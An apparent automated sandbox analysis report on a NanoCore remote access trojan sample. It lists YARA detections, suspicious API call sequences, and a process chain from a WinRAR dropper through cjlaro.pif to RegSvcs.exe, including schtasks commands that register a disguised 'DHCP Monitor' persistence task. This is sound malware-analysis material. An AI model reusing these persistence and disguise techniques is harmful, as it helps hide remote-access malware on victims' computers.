    Source: 5.2.RegSvcs.exe.3a8b041.5.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
    Source: 20.3.cjlaro.pif.4865448.3.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
    Source: 20.3.cjlaro.pif.4865448.3.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
    Source: 20.3.cjlaro.pif.4865448.3.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
    Source: 20.3.cjlaro.pif.4899c50.1.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
    Source: 20.3.cjlaro.pif.4899c50.1.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
    Source: 20.3.cjlaro.pif.4899c50.1.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
    Source: 00000005.00000002.560410383.0000000006110000.00000004.00020000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
    Source: 00000005.00000002.560410383.0000000006110000.00000004.00020000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
    Source: 0000001B.00000003.383284019.000000000478A000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
    Source: 0000001B.00000003.383284019.000000000478A000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
    Source: 00000004.00000003.315424551.0000000004EA3000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
    Source: 00000004.00000003.315424551.0000000004EA3000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
    Source: 00000005.00000002.555314514.0000000000502000.00000040.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
    Source: 00000005.00000002.555314514.0000000000502000.00000040.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
    Source: 00000014.00000003.359982101.00000000048CF000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
    Source: 00000014.00000003.359982101.00000000048CF000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
    Source: 00000014.00000003.363952559.00000000048CF000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
    Source: 00000014.00000003.363952559.00000000048CF000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
    Source: 0000001B.00000003.383566865.00000000047F3000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
    Source: 0000001B.00000003.383566865.00000000047F3000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
    Source: 0000001B.00000003.385418574.0000000004828000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
    Source: 0000001B.00000003.385418574.0000000004828000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
    Source: 00000014.00000003.363022584.0000000004938000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
    Source: 00000014.00000003.363022584.0000000004938000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
    Source: 00000014.00000003.360137256.000000000489A000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
    Source: 00000014.00000003.360137256.000000000489A000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
    Source: 00000019.00000002.390692877.0000000000F62000.00000040.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
    Source: 00000019.00000002.390692877.0000000000F62000.00000040.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
    Source: 00000004.00000003.314549221.0000000004D88000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
    Source: 00000004.00000003.314549221.0000000004D88000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
    Source: 0000001B.00000003.386694211.0000000004721000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
    Source: 0000001B.00000003.386694211.0000000004721000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
    Source: 00000004.00000003.315994973.0000000004E6E000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
    Source: 00000004.00000003.315994973.0000000004E6E000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
    Source: 00000014.00000003.364780852.000000000489A000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
    Source: 00000014.00000003.364780852.000000000489A000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
    Source: 0000001B.00000003.386537145.00000000047F2000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
    Source: 0000001B.00000003.386537145.00000000047F2000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
    Source: Process Memory Space: cjlaro.pif PID: 5028, type: MEMORYSTR Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
    Source: Process Memory Space: cjlaro.pif PID: 5028, type: MEMORYSTR Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
    Source: Process Memory Space: RegSvcs.exe PID: 6364, type: MEMORYSTR Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
    Source: Process Memory Space: RegSvcs.exe PID: 6364, type: MEMORYSTR Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
    Source: Process Memory Space: cjlaro.pif PID: 7152, type: MEMORYSTR Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
    Source: Process Memory Space: cjlaro.pif PID: 7152, type: MEMORYSTR Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
    Source: C:\Users\user\77066510\cjlaro.pif Code function: 4_2_011633A3 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,SetSystemPowerState,4_2_011633A3
    Source: C:\Users\user\77066510\cjlaro.pif Code function: 10_2_011633A3 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,SetSystemPowerState,10_2_011633A3
    Source: C:\Users\user\77066510\cjlaro.pif Code function: 20_2_011633A3 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,SetSystemPowerState,20_2_011633A3
    Source: C:\Users\user\Desktop\dUzAkYsvl8.exe Code function: String function: 0020E2F0 appears 31 times
    Source: C:\Users\user\Desktop\dUzAkYsvl8.exe Code function: String function: 0020D940 appears 50 times
    Source: C:\Users\user\Desktop\dUzAkYsvl8.exe Code function: String function: 0020D870 appears 35 times
    Source: C:\Users\user\77066510\cjlaro.pif Code function: String function: 0113E970 appears 61 times
    Source: C:\Users\user\77066510\cjlaro.pif Code function: String function: 01146B90 appears 115 times
    Source: C:\Users\user\77066510\cjlaro.pif Code function: String function: 01148115 appears 61 times
    Source: C:\Users\user\77066510\cjlaro.pif Code function: String function: 011414F7 appears 81 times
    Source: C:\Users\user\77066510\cjlaro.pif Code function: String function: 01131D10 appears 68 times
    Source: C:\Users\user\77066510\cjlaro.pif Code function: String function: 011413CB appears 42 times
    Source: C:\Users\user\77066510\cjlaro.pif Code function: String function: 01139190 appears 39 times
    Source: C:\Users\user\77066510\cjlaro.pif Code function: String function: 0114333F appears 54 times
    Source: C:\Users\user\77066510\cjlaro.pif Code function: String function: 01152160 appears 54 times
    Source: C:\Users\user\77066510\cjlaro.pif Code function: String function: 01160165 appears 53 times
    Source: C:\Users\user\77066510\cjlaro.pif Code function: String function: 011759E6 appears 146 times
    Source: C:\Users\user\77066510\cjlaro.pif Code function: String function: 01131DE0 appears 32 times
    Source: C:\Users\user\77066510\cjlaro.pif Code function: String function: 01132390 appears 32 times
    Source: C:\Users\user\77066510\cjlaro.pif Code function: String function: 011431BB appears 32 times
    Source: C:\Users\user\Desktop\dUzAkYsvl8.exe Code function: 0_2_001F6FC6: __EH_prolog,CreateFileW,CloseHandle,CreateDirectoryW,CreateFileW,DeviceIoControl,CloseHandle,GetLastError,RemoveDirectoryW,DeleteFileW,0_2_001F6FC6
    Source: dUzAkYsvl8.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
    Source: C:\Users\user\Desktop\dUzAkYsvl8.exeFile created: C:\Users\user\77066510
    Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@26/37@6/2
    Source: C:\Users\user\Desktop\dUzAkYsvl8.exeFile read: C:\Windows\win.ini
    Source: C:\Users\user\Desktop\dUzAkYsvl8.exeCode function: 0_2_001F6D06 GetLastError,FormatMessageW,0_2_001F6D06
    Source: C:\Users\user\Desktop\dUzAkYsvl8.exeCode function: 0_2_0020963A FindResourceW,DeleteObject,SizeofResource,LoadResource,LockResource,GlobalAlloc,GlobalLock,GdipCreateHBITMAPFromBitmap,GlobalUnlock,GlobalFree,0_2_0020963A
    Source: unknownProcess created: C:\Windows\System32\wscript.exe 'C:\Windows\System32\WScript.exe' 'C:\Users\user\77066510\Update.vbs'
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile created: C:\Program Files (x86)\DHCP Monitor
    Source: dUzAkYsvl8.exeVirustotal: Detection: 52%
    Source: dUzAkYsvl8.exeReversingLabs: Detection: 55%
    Source: C:\Users\user\Desktop\dUzAkYsvl8.exeFile read: C:\Users\user\Desktop\dUzAkYsvl8.exe
    Source: C:\Users\user\Desktop\dUzAkYsvl8.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
    Source: unknownProcess created: C:\Users\user\Desktop\dUzAkYsvl8.exe 'C:\Users\user\Desktop\dUzAkYsvl8.exe'
    Source: C:\Users\user\Desktop\dUzAkYsvl8.exeProcess created: C:\Users\user\77066510\cjlaro.pif 'C:\Users\user\77066510\cjlaro.pif' txoxpdjc.qnr
    Source: C:\Users\user\77066510\cjlaro.pifProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess created: C:\Windows\SysWOW64\schtasks.exe 'schtasks.exe' /create /f /tn 'DHCP Monitor' /xml 'C:\Users\user\AppData\Local\Temp\tmp1EC2.tmp'
    Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess created: C:\Windows\SysWOW64\schtasks.exe 'schtasks.exe' /create /f /tn 'DHCP Monitor Task' /xml 'C:\Users\user\AppData\Local\Temp\tmp2720.tmp'
    Source: unknownProcess created: C:\Users\user\77066510\cjlaro.pif 'C:\Users\user\77066510\cjlaro.pif' C:\Users\user\77066510\txoxpdjc.qnr
    Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: unknownProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe 0
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: unknownProcess created: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe 'C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe' 0
    Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: unknownProcess created: C:\Users\user\77066510\cjlaro.pif 'C:\Users\user\77066510\cjlaro.pif' C:\Users\user\77066510\txoxpdjc.qnr
    Source: unknownProcess created: C:\Windows\System32\wscript.exe 'C:\Windows\System32\WScript.exe' 'C:\Users\user\77066510\Update.vbs'
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\77066510\cjlaro.pif 'C:\Users\user\77066510\cjlaro.pif' C:\Users\user\77066510\txoxpdjc.qnr
    Source: C:\Users\user\77066510\cjlaro.pifProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\77066510\cjlaro.pif 'C:\Users\user\77066510\cjlaro.pif' C:\Users\user\77066510\txoxpdjc.qnr
    Source: unknownProcess created: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe 'C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe'
    Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Users\user\77066510\cjlaro.pifProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
    Source: C:\Users\user\Desktop\dUzAkYsvl8.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00BB2765-6A77-11D0-A535-00C04FD7D062}\InProcServer32
    Source: C:\Users\user\77066510\cjlaro.pifCode function: 4_2_01194AEB OpenProcess,GetLastError,GetLastError,GetCurrentThread,OpenThreadToken,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,AdjustTokenPrivileges,GetLastError,OpenProcess,AdjustTokenPrivileges,CloseHandle,TerminateProcess,GetLastError,CloseHandle,4_2_01194AEB
    Source: C:\Users\user\77066510\cjlaro.pifCode function: 10_2_01194AEB OpenProcess,GetLastError,GetLastError,GetCurrentThread,OpenThreadToken,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,AdjustTokenPrivileges,GetLastError,OpenProcess,AdjustTokenPrivileges,CloseHandle,TerminateProcess,GetLastError,CloseHandle,10_2_01194AEB
    Source: C:\Users\user\77066510\cjlaro.pifCode function: 20_2_01194AEB OpenProcess,GetLastError,GetLastError,GetCurrentThread,OpenThreadToken,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,AdjustTokenPrivileges,GetLastError,OpenProcess,AdjustTokenPrivileges,CloseHandle,TerminateProcess,GetLastError,CloseHandle,20_2_01194AEB
    Source: C:\Users\user\77066510\cjlaro.pifFile created: C:\Users\user\temp\hrennftnds.cpl
    Source: C:\Users\user\77066510\cjlaro.pifCode function: 4_2_0119E0F6 CoInitialize,CoCreateInstance,CoUninitialize,4_2_0119E0F6
    Source: C:\Users\user\77066510\cjlaro.pifCode function: 4_2_0118D766 SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode,4_2_0118D766
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
    Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
    Source: C:\Users\user\77066510\cjlaro.pifCode function: 4_2_011A557E CreateToolhelp32Snapshot,Process32FirstW,__wsplitpath,_wcscat,__wcsicoll,Process32NextW,CloseHandle,4_2_011A557E
    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6432:120:WilError_01
    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6828:120:WilError_01
    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6612:120:WilError_01
    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6816:120:WilError_01
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeMutant created: \Sessions\1\BaseNamedObjects\Global\{ba2baad0-dd3f-4844-a1e3-4d042f9ae8b6}
    Source: C:\Users\user\Desktop\dUzAkYsvl8.exeCommand line argument: ps#0_2_0020CBB8
    Source: C:\Users\user\Desktop\dUzAkYsvl8.exeCommand line argument: sfxname0_2_0020CBB8
    Source: C:\Users\user\Desktop\dUzAkYsvl8.exeCommand line argument: sfxstime0_2_0020CBB8
    Source: C:\Users\user\Desktop\dUzAkYsvl8.exeCommand line argument: STARTDLG0_2_0020CBB8
    Source: C:\Users\user\Desktop\dUzAkYsvl8.exeFile written: C:\Users\user\77066510\gmbvs.ini
    Source: 5.2.RegSvcs.exe.500000.0.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
    Source: 5.2.RegSvcs.exe.500000.0.unpack, u0023u003dqVxXNKnhAcArgJoGGYXiyyQu003du003d.csCryptographic APIs: 'CreateDecryptor'
    Source: 5.2.RegSvcs.exe.500000.0.unpack, u0023u003dqVxXNKnhAcArgJoGGYXiyyQu003du003d.csCryptographic APIs: 'TransformFinalBlock'
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile read: C:\Windows\System32\drivers\etc\hosts
    Source: Window RecorderWindow detected: More than 3 window changes detected
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
    Source: dUzAkYsvl8.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
    Source: dUzAkYsvl8.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
    Source: dUzAkYsvl8.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
    Source: dUzAkYsvl8.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
    Source: dUzAkYsvl8.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
    Source: dUzAkYsvl8.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
    Source: dUzAkYsvl8.exeStatic PE information: TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
    Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: dUzAkYsvl8.exe, 00000000.00000000.289072563.0000000000222000.00000002.00020000.sdmp
    Source: Binary string: RegSvcs.pdb, source: dhcpmon.exe, 00000010.00000002.347719934.0000000000D32000.00000002.00020000.sdmp
